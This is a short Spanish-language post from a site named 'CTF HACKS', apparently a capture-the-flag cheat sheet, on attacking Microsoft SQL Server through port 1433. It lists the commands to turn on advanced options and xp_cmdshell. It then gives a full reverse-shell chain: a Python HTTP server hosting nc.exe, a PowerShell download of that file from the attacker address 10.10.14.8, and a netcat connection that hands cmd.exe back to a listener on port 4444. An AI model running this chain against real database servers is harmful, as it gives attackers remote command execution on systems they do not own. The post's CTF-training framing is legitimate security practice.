CTF HACKS

Menú

Habilitar XP_CMDSHELL y ejecutar comandos en MSSQL

Por /

A continuación tienes los comandos para saber como ejecutar comandos con XP_CMDSHELL y habilitar las ADVANCED OPTIONS desde la Base de Datos de Microsoft SQL Server o también abreviada (MSSQL).

Ten en cuenta que existen más formas de atacar una máquina a través del puerto 1433 (MSSQL).

  • Leer archivos con XP_DIRTREE

Habilitar Opciones Avanzadas MSSQL

En algunos casos tu usuario quizás no tenga permiso como para activar esta opción.

SQL> SP_CONFIGURE "show advanced options", 1

SQL> RECONFIGURE

Habilitar XP_CMDSHELL MSSQL

En algunos casos tu usuario quizás no tenga permiso como para activar esta opción.

SQL> SP_CONFIGURE "xp_cmdshell", 1

SQL> RECONFIGURE

Reverse shell con XP_CMDSHELL

Ahora podrás obtener una SHELL interactiva para ejecutar comandos simplemente haciendo la reverse shell a tu máquina Kali o Parrot.

Primero ábrete un servidor con python3 donde tengas el programa nc.exe

KALI> python3 -m http.server 8000

Ahora ejecutas los siguientes comandos en la consola de MSSQL con XP_CMDSHELL.

SQL> xp_cmdshell "powershell.exe wget http://10.10.14.8:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe"

SQL> xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe 10.10.14.8 4444"

IP Atacante (Tú IP): 10.10.14.8

Puerto en escucha: 4444 

KALI> nc -lvp 4444

Deja un comentario

Scroll al inicio
CTF HACKS
Powered by  GDPR Cookie Compliance
Resumen de privacidad

Esta web utiliza cookies para que podamos ofrecerte la mejor experiencia de usuario posible. La información de las cookies se almacena en tu navegador y realiza funciones tales como reconocerte cuando vuelves a nuestra web o ayudar a nuestro equipo a comprender qué secciones de la web encuentras más interesantes y útiles.